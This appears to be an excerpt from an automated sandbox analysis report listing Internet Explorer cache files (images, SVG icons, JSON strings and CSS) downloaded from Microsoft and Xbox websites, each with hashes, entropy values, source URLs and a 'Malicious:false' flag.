                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................f....................................................o...c{.mn{(...c.}.....i...w.2\......K.k._g.%q..1\.b..X$.NZ..z.....[..}.7.0.7cT.=G..;...6..tp...........jh......j.."{.:2ca.g............%+..Y.RQm6.eb..@.....jQ..zI5.!...|.>@.....X....H..p.Q7.J.........S..'...4A#za.B......E...<.5......[..A#z].k.I.x..U.....C.........0.Msyx..XH.U1..d...k.n.jC5...L....V.oB..D.7..I./...H.V.....\.v..[Z.w.y.....4..^.A.5.o..f.~......N..J....o....{Zi.4..X...............o....7.5.k..E.A..;...kz.z...........:..............9P[.:...~v.....S).U...@.64..-.^I.A#~i.b..}Y.y.5#.=\.~X.vot-..W].I..4.."SE.V...7..#jg.u_.n.S>.RN^...)...z6..T..*_.@.VH...8..../..e..M3.......jq.P\.#mxW]|....._^0.....+~_.h.J...-....r..Z....4+...L....5.i........i......PE..2._vmh..faoV2x..[.....p4.ux.4wOt..y1.+~f.M$+G.\....c...qB......4IX......
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\1920_Panel15_Mosaic_Item4_Laptop[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 425x425, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):29197
                                                                                                                                                                                                              Entropy (8bit):7.912570848111608
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:KW0ns7jIIjz+8W1Y1fvbUNYW5H+x3OTHysMB:KW0sPIIj67Y1fY7JY3O+fB
                                                                                                                                                                                                              MD5:FB97AEC9612294AB06BA6B9DEDC89883
                                                                                                                                                                                                              SHA1:247C3E4E9CEF5DDDD2EE28593AA079E5C2C85E2D
                                                                                                                                                                                                              SHA-256:0A6CF55F2709D61ECB5F7D7D00623949EF2832D682F439560B55230D2EF8B9EB
                                                                                                                                                                                                              SHA-512:634FB7410F42E19BAB84ED5ABC89376EA580E4535AC9FDCDF6C161BCE8A6BE42B76BC2B9720890E21E42E64E14B89F59C6F1570295F1EEBD124B4ED12D246B87
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel15_Mosaic_Item4_Laptop.jpg?version=f0064a2e-27a2-92cd-adb6-98d8fa9518f5
                                                                                                                                                                                                              Preview: ......JFIF..............................................................................................................................................................................................................`.G..h.~..Y..6.k...o.x...m...z......S....8^f.g...=.._..P..rg..=..<..>.3c..o..sk..w."?.=.K._?..?.._...Q.........G.o..:..3a.d.....lvi.......N......{_n.....esu.20....{;....)...~.....{..{....2.~.....1...p~....^_....l.z.....{...[......=^.mt.9>[.....c......?.Vy...../....?.iz.........z......9...l....j..P~....}.ym\t.L.vz.;......9.C....{...j.b...{...;..J.Z.>.....m..=Id....}..1.Q.q.E..L;:Yo....R.m|.1.....l..Km...!.1.D..?...]}.\..e........<M..uvs..*..>.S.....t9...\ym..).5o..4c..{...=?g...+....>.x.....+.....t..o...u...._....~....}-.1.<8pc...)...>...Kc..c.c..........j.g.b.......|....g...\X.S..X.p.....+.X..eX.}..1...W....c.L5.Z..s.\5.8....7.o.`...<..~...c_]j.c....pk......+..._. .....z.........c.....Y....Ek.f..r}b.4...(.c.f...2N^.K{cgg6..{Mr.....
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\1920_Panel15_Mosaic_Item5_FingerPrint[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 425x425, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):33923
                                                                                                                                                                                                              Entropy (8bit):7.947833372756695
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:OWcBlOZneG/+Hz4biqn+tuPJcgki+nwxjMXe:ObTOZn5/m4biZtKkiQ4jn
                                                                                                                                                                                                              MD5:E9C9090F342613396B11AD28B49074E3
                                                                                                                                                                                                              SHA1:B01241A8F003B6F9771ADC02E9A87CED7F5D3C7F
                                                                                                                                                                                                              SHA-256:65AD9702736D35C677712659D86108D310E0990B4FD84D2B8B5884DB5ACF0367
                                                                                                                                                                                                              SHA-512:05C1630F3F86E543ADC05549935A64C2B0516ACCEE9BD7E77295B6CCB911E32456521056F67A00FA8A9623A86DA5CEFB2B3FDC2390363B1827733669C2CAFC2E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel15_Mosaic_Item5_FingerPrint.jpg?version=cfeec1b3-0aca-ea61-5d21-82f3fc9bd1a7
                                                                                                                                                                                                              Preview: ......JFIF..............................................................................................................................................................................................................d..%lD Z.h..X.. ...H$..BHD.Z.H.2..X.d.....e`.... 0.$ Hd.I+^..`.XI..l%M.........". ..{.C$....^.....R.$.Hd.I...G{ .....2....3.$2@`..`0......[Ih.".....'-.. ....B-...?...BI..............21.d>.r/t>.."AEb..{.......v1.vVV^_ ..3..9..3.u...i.kC.......].k2......e|....YKAx...%.....0.Y.e.....Y9y..~f.....2V.^..m.6...k..e..........D...0.yj...K.nnK...v..k.....C?#R......iabM....k5.fC..........f.....Z.M.S{.Z...].k^....egeg...i..X.2...e....f]..c...=.YY99....._!$.K.mick...Z.k.....fS........}-....7...../wF^._|.7+%.y.y.Y.yGDI.^....6...v...H,.cX.?%..99.99.......c!,..fg=.....b..q.^../k5.c..5..Ca..6.......nw1...|j.$..krY...........{.u..KBd$...~u....;VNzz...S...._Oe...nC...O0....y2Bd1...\?.u.....'.p.G..3...]6..9.{.22......`..^..=..%.&d...'.q..j......~..#..3:.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\1920_Panel15_Mosaic_Item6_Blue[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:[TIFF image data, little-endian, direntries=0], baseline, precision 8, 890x425, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):5648
                                                                                                                                                                                                              Entropy (8bit):1.743138723448018
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:lK1h6A1aWwh82lYSgeobh9VbgbhGT3TyJEumGumNG0jJdYOkda:y11Lvn+Uh9RMhGCJEdGdNVJHr
                                                                                                                                                                                                              MD5:206E4799EBAD60F1C70129252BC5A7D1
                                                                                                                                                                                                              SHA1:4AFC730F7C9F2AD753E7F040F1B692E7C2AF9854
                                                                                                                                                                                                              SHA-256:260D43BC3C998FE12ABAD302F3BD0F41A4660EF8924269F970DE79F3AB33957A
                                                                                                                                                                                                              SHA-512:AEB398356C740CCBF0916AFCE49A45B5A484AD671154646B45C9081315F7F70ED803B4C3ED5D7092EEEB9DC48BDA735F9250589D435B7004717CCC6A8C8458E4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel15_Mosaic_Item6_Blue.jpg?version=838eebb7-ef23-731b-ee07-deea2ae49dc8
                                                                                                                                                                                                              Preview: ......Exif..II*.................Ducky.......K......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:EA866DAA5CBA11EA88EEDBD181122FD0" xmpMM:InstanceID="xmp.iid:EA866DA95CBA11EA88EEDBD181122FD0" xmp:CreatorTool="Adobe Photoshop 2020 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="8F6B98E30D2E75BCEAE1C4EA6B2EEB5C" stRef:documentID="8F6B98E30D2E75BCEAE1C4EA6B2EEB5C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\1920_Panel2_LinkNav_HelpMeChoose[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2499
                                                                                                                                                                                                              Entropy (8bit):4.145286575041427
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:hXBDPbKtEkwWBPwl3nX2hjYhduOmfQ5pAUiBSzycF:RstEIBPwl3naCeFotF
                                                                                                                                                                                                              MD5:C995AB370737A85F1F2B6F1739EE7077
                                                                                                                                                                                                              SHA1:00623A7B72F4933A002628868790B124054B3141
                                                                                                                                                                                                              SHA-256:80A5896A0FB0D209C0303FD5BE3F686B7727F7528FA067E1E0D6CCB276BDAD58
                                                                                                                                                                                                              SHA-512:5C9952C381508CBD8BFE45D898B967135D32506D88B4A02B7CA27899FB27B43D6738D2328137D1EEC18656EA644761BD73FE076D0D7BDBBBD46A94A347FC075D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel2_LinkNav_HelpMeChoose.svg?version=d3c060d1-e606-96d2-1f19-7332c489661c
                                                                                                                                                                                                              Preview: <svg enable-background="new 0 0 64 64" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg"><switch><foreignObject height="1" requiredExtensions="http://ns.adobe.com/AdobeIllustrator/10.0/" width="1"/><path d="m46.625 25.143c.469 0 .908.089 1.318.268s.768.423 1.072.732c.305.31.545.673.721 1.089.176.417.264.863.264 1.339v10.393c0 1.476-.296 2.777-.888 3.902s-1.377 2.068-2.355 2.83c-.979.762-2.095 1.336-3.349 1.723s-2.543.581-3.867.581c-1.102 0-2.06-.065-2.874-.196s-1.538-.321-2.171-.571-1.201-.562-1.705-.938-1.008-.81-1.512-1.304-1.028-1.042-1.573-1.643-1.169-1.259-1.872-1.973c-.375-.381-.756-.762-1.143-1.143s-.768-.768-1.143-1.161c-.82.381-1.635.762-2.443 1.143-.809.381-1.617.762-2.426 1.143l-2.021-4.446c-.773.786-1.55 1.562-2.329 2.33s-1.556 1.545-2.329 2.33v-25.375l15.75 16v-12.767c0-.476.088-.923.264-1.339.176-.417.416-.78.721-1.089s.662-.554 1.072-.732.849-.269 1.318-.269c.656 0 1.198.113 1.626.339s.768.524 1.02.893.431.798.536 1.286.173.994.202 1.518.035 1.048.018 1.571-.027 1.0
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\1c606d1e-b2f7-477f-ab81-21cf9ce15f90[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2358
                                                                                                                                                                                                              Entropy (8bit):4.6254291121844755
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvAvf3SBOnk8vw34AjQpFvf6Gitij381ZJOFd8GPB0Y6IBZ:LvfGD8vw34AjQvf6Gitijs1ZJOFd8G+I
                                                                                                                                                                                                              MD5:4C9D5102B7F717C436ED54701AF18C6E
                                                                                                                                                                                                              SHA1:4E0AB9B9B71B2CA9757691129747C195F9080549
                                                                                                                                                                                                              SHA-256:DAB1CE998096002CC46CACB29906E016FE724D675D1915DFFF84ED84E655526B
                                                                                                                                                                                                              SHA-512:F692441F98B649787DFF55702E2399D3D9B380366074457E9997A535A788DD21B6C5B555051E9545D194A18EE679987FB9E2F40DD02781A968EAE9EABAB9A95B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/1c/60/1c606d1e-b2f7-477f-ab81-21cf9ce15f90.svg?n=Homepage-FY20_Home-Icons-0_Games_72x56-01.svg
                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 23.1.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 72 56" enable-background="new 0 0 72 56" xml:space="preserve">.<rect fill="#FFFFFF" width="72" height="56"/>.<g id="Games">..<g>...<g>....<g>.....<path fill="#107C10" d="M59.8,49.7c-1,0-1.9-0.8-6.9-5.4c-1.6-1.5-3.7-3.4-4.2-3.8c-0.2-0.1-0.4-0.2-0.6-0.4......c-0.8-0.5-1.4-0.9-5.1-0.9c-4-0.1-6.5,0-6.9,0c-0.5,0-3,0-7,0c-3.8,0.1-4.3,0.4-5.1,0.9c-0.2,0.1-0.4,0.2-0.6,0.4......c-0.5,0.3-2.6,2.3-4.2,3.7c-5.4,5-6,5.5-7.1,5.4c-1.3-0.1-3.7-1.1-5.2-3.4c-1.7-2.6-2.1-5.8-1.1-11c1-5.5,5.4-19.9,6.6-22.1......c0.3-0.6,0.9-1.2,1.8-1.7c0.3-1.4,0.6-1.9,1.2-2.3L15.5,9c0.5-0.3,2.6-1.6,4.7-2c0,0,5-1.1,6.4-0.4c0.1,0.1,0.3,0.1,0.5,0.2......c0.4,0.2,1.4,0.7,1.8,0.8h1.4c0,0,2.7,0,5.7,0s5.7,0,5.7,0h1.4c0.4-0.1,1.3-0.6,1.7-0.8c0.2-0.1,0.4-0.2,0.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\1x1clear[1].gif
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                              Entropy (8bit):3.122191481864228
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:CUTxls/1h/:7lU/
                                                                                                                                                                                                              MD5:F8614595FBA50D96389708A4135776E4
                                                                                                                                                                                                              SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                                                                                                                                                                                              SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                                                                                                                                                                                              SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/9be151e5/coreui.statics/images/1x1clear.gif
                                                                                                                                                                                                              Preview: GIF89a.............!.......,...........D..;
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\1x1clear[2].gif
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                              Entropy (8bit):3.122191481864228
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:CUTxls/1h/:7lU/
                                                                                                                                                                                                              MD5:F8614595FBA50D96389708A4135776E4
                                                                                                                                                                                                              SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                                                                                                                                                                                              SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                                                                                                                                                                                              SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://statics-storeexp-neu-ms-com.akamaized.net/_h/9be151e5/coreui.statics/images/1x1clear.gif
                                                                                                                                                                                                              Preview: GIF89a.............!.......,...........D..;
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\22561495Platform_20200401_22561495[1].json
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4242
                                                                                                                                                                                                              Entropy (8bit):4.869488209652324
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:/91GclLjVCDvtsjSQsapFrcYn2R5GcHm6L8xazKMh0jThRKHzQ3yjto4vSKBJTmM:/9cclL5abbapF4Yn2PGcHm6L8xazKMh5
                                                                                                                                                                                                              MD5:C2A3DDF8E27595EC69431352399203AC
                                                                                                                                                                                                              SHA1:C752B6A26DC9038ADE9BF116032CB59CBC941A7A
                                                                                                                                                                                                              SHA-256:BF90FCA7309518C1686949E0F14C3DC1F430E169210F0C6A96E4209267A1EDA8
                                                                                                                                                                                                              SHA-512:5E4294F38A25026BB547CE0A460AC2E7FD73DD8664CD1A7F69C607087E6FA8EBB20A35C2772BA32AF295D14A5F5AE57ED4E4A63DC8EBAC782C45E896E2A584C0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/de-ch/videoplayer/resources/22561495Platform_20200401_22561495
                                                                                                                                                                                                              Preview: {"agegate_day":"Tag","agegate_enterdate":"Geben Sie Ihr Geburtsdatum ein.","agegate_fail":"Sie haben keinen Zugriff auf diesen Inhalt.","agegate_month":"Monat","agegate_submit":"Senden","agegate_year":"Jahr","audio_tracks":"Audiotitel","agegate_dateorder":"dd.MM.yyyy","browserunsupported":"Ihr Browser unterst.tzt dieses Video leider nicht.","browserunsupported_download":"Laden Sie eine Kopie dieses Videos zur Ansicht auf Ihrem Ger.t herunter:","cc_appearance":"Darstellung","cc_color_black":"Schwarz","cc_color_blue":"Blau","cc_color_cyan":"Zyan","cc_color_green":"Gr.n","cc_color_grey":"Grau","cc_color_magenta":"Magenta","cc_color_red":"Rot","cc_color_white":"Wei.","cc_color_yellow":"Gelb","cc_customize":"Anpassen","cc_font_name_casual":"Informell","cc_font_name_cursive":"Kursiv","cc_font_name_monospacedsansserif":"Monospace Sans Serif","cc_font_name_monospacedserif":"Monospaced Serif","cc_font_name_proportionalsansserif":"Proportional Sans Serif","cc_font_name_proportionalserif":"Pr
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\34246619Platform_20210506_34246619[1].json
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):3931
                                                                                                                                                                                                              Entropy (8bit):4.8079273430772025
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:JbXNfza6QXVCDvtHwjavQg5xXVsryRyAcgo039V768KLaa2KATNp6+/QX4PZNwTc:Jbhe6QFaHxvB5xXVsryoAcgo039V768X
                                                                                                                                                                                                              MD5:2113FF57954680F90A4CDDD5A616F83F
                                                                                                                                                                                                              SHA1:5559FC2270328D3962FDACB108519786192B04BA
                                                                                                                                                                                                              SHA-256:07BE01E5A83F3D70C4D9B22FDB1F00BF0EADB88EF97C548E7122C7698D1A972E
                                                                                                                                                                                                              SHA-512:2475022E61CCD996B77435FCAAB3361EAB53221EA1D2AEB8CFD637064236964C9E95B3A685713D192D394A4CEF6DED801915AF64E76A85582518D068DA9F4B61
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/en-us/videoplayer/resources/34246619Platform_20210506_34246619
                                                                                                                                                                                                              Preview: {"agegate_day":"Day","agegate_enterdate":"Enter your date of birth","agegate_fail":"You may not access this content.","agegate_month":"Month","agegate_submit":"Submit","agegate_year":"Year","audio_tracks":"Audio tracks","agegate_dateorder":"m/d/yyyy","browserunsupported":"We\u0027re sorry, but your browser does not support this video.","browserunsupported_download":"Please download a copy of this video to view on your device:","cc_appearance":"Appearance","cc_color_black":"Black","cc_color_blue":"Blue","cc_color_cyan":"Cyan","cc_color_green":"Green","cc_color_grey":"Grey","cc_color_magenta":"Magenta","cc_color_red":"Red","cc_color_white":"White","cc_color_yellow":"Yellow","cc_customize":"Customize","cc_font_name_casual":"Casual","cc_font_name_cursive":"Cursive","cc_font_name_monospacedsansserif":"Monospaced Sans Serif","cc_font_name_monospacedserif":"Monospaced Serif","cc_font_name_proportionalsansserif":"Proportional Sans Serif","cc_font_name_proportionalserif":"Proportional Serif","c
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\464e0689-d849-485f-973f-4a631964041a[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1869
                                                                                                                                                                                                              Entropy (8bit):4.657810281356564
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvAvf3a+J/EJ0xoLX4LIrYzpmkYC6XVDmvVEB0RQBHfwuz:Lvfq+a0xWXHUYCec9EGRQBHfwuz
                                                                                                                                                                                                              MD5:30F170B7989AD70FC9C4B7674E9657BC
                                                                                                                                                                                                              SHA1:500089590B220B4B86CB75ABC9394695C554B157
                                                                                                                                                                                                              SHA-256:8C0EC80A8EECC75CAE359326032D7438F889E02F7EFF8EEFF101FC66829E2BAF
                                                                                                                                                                                                              SHA-512:BBA62F9A7C3A57DABA9C033491C0388C42AA78A83CE5D3E623767D4927131F959BBC59E143ABE056482E5277F6C50855D290CD5F13100B3FD95EC1C705AC1A99
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/46/4e/464e0689-d849-485f-973f-4a631964041a.svg?n=Xbox-Follow-Footer_Image-0_Instagram_32x32.svg
                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 23.1.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 32 32" enable-background="new 0 0 32 32" xml:space="preserve">.<rect fill="#FFFFFF" width="32" height="32"/>.<g>..<path fill="#171717" d="M10.5,2.4c-2.8,0-3.1,0-4.2,0.1S4.4,2.7,3.8,3C3.1,3.2,2.5,3.6,1.9,4.2C1.4,4.7,1,5.3,0.8,6...C0.5,6.6,0.3,7.4,0.3,8.5c-0.1,1.1-0.1,1.4-0.1,4.2s0,3.1,0.1,4.2c0,1.1,0.2,1.8,0.5,2.5s0.6,1.2,1.2,1.8c0.6,0.6,1.1,0.9,1.8,1.2...c0.7,0.3,1.4,0.4,2.5,0.5S7.7,23,10.5,23s3.1,0,4.2-0.1c1.1,0,1.8-0.2,2.5-0.5s1.2-0.6,1.8-1.2c0.6-0.6,0.9-1.1,1.2-1.8...c0.3-0.7,0.4-1.4,0.5-2.5s0.1-1.4,0.1-4.2s0-3.1-0.1-4.2c0-1.1-0.2-1.8-0.5-2.5S19.6,4.8,19,4.2S17.9,3.3,17.2,3...c-0.7-0.3-1.4-0.4-2.5-0.5C13.6,2.5,13.3,2.4,10.5,2.4L10.5,2.4L10.5,2.4z M10.5,4.3c2.7,0,3.1,0,4.2,0.1c1,0,1.5,0.2,1.9,0.4...c0.5,0.2,0.8,0.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\52-7ec320[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):169165
                                                                                                                                                                                                              Entropy (8bit):5.043574839315944
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:jzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxh:jlZAjLkJeTC
                                                                                                                                                                                                              MD5:FC80EE0EE4C1195A0A3573C1F22E53A8
                                                                                                                                                                                                              SHA1:82AEF853A84BE4A2C3684E67ED83F577DF61557A
                                                                                                                                                                                                              SHA-256:1B61B75684F6AC70F426526277CC6730A26CA157B7632FF0EB6A2DC4D15D94C8
                                                                                                                                                                                                              SHA-512:C367661A89582A133F88D6E141BAF95AF4C3DA42ED27954B856DD52B1D2593A9ED8B1EFE4BC176F845F5BD2FCDF14CEEA172AF7F68ACB334ADA871CD99F2BAFA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/16-3b4837/cf-7f2b14/7b-5ab060/b2-7c2f2c/af-85090f/b0-adecbe/42-6d7c67/52-7ec320?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: @charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\54-3764f9[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):30133
                                                                                                                                                                                                              Entropy (8bit):5.009269115634484
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:68ErSq5YklxlNQ4gYq0qM+iPAeUxUDUzUBGjjjFjtrVrzdrd9:68ErSq5YkflNQ4gYq0qM+iPAeUxUDUzv
                                                                                                                                                                                                              MD5:6978BD8B7FDF8CA4360B783BBD4C33BF
                                                                                                                                                                                                              SHA1:C89ACEB6152ACA8F82F47F85FA48C0D9FB61926B
                                                                                                                                                                                                              SHA-256:D69E3231E28FBB9BB21122601BC7E55C83E31172D7E1087984E0544725385B4F
                                                                                                                                                                                                              SHA-512:62FEA0A26C353937F6541BB9433A0E6C926D3AA2D12E6CAA112373A07A3A11439DCE53B566093A580D608807A0977053E6D1275DDAD1F446A3EEC19F56B7FFF2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/west-european/mscomhp/_scrf/css/themes=default.device=uplevel_web/5a-0bf7d0/cd-a7831c/54-3764f9?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: .html,body,#primaryArea,#primaryR1,#videoplayeriframe{height:100%;width:100%;overflow:hidden}.m-video-player.full-width{padding-left:0;padding-right:0}.m-video-player.expand-preview-image .x-sfa-video img{width:100%;display:inline-block}.x-sfa-video{display:flex;height:100%;overflow:hidden;width:100%}.x-sfa-video img{height:100%;margin:auto;display:block}.x-sfa-video .f-video-trigger section div button{background:rgba(0,0,0,0.6) !important}.x-sfa-video:focus{outline:3px solid #FFF}.c-video-player{cursor:pointer}a.x-sfa-video .c-video-player{position:relative;padding-bottom:56.25% !important;padding-top:30px !important;height:0;overflow:hidden;min-width:320px}a.x-sfa-video .f-core-player{position:absolute;top:0;left:0;width:100%;height:100%}@media screen and (-ms-high-contrast: active){.c-video-player .f-video-trigger section{background:rgba(255,255,255,0)}}@media screen and (-ms-high-contrast: black-on-white){.c-video-player .f-video-trigger section{background:rgba(255,255,255,0)}}.c
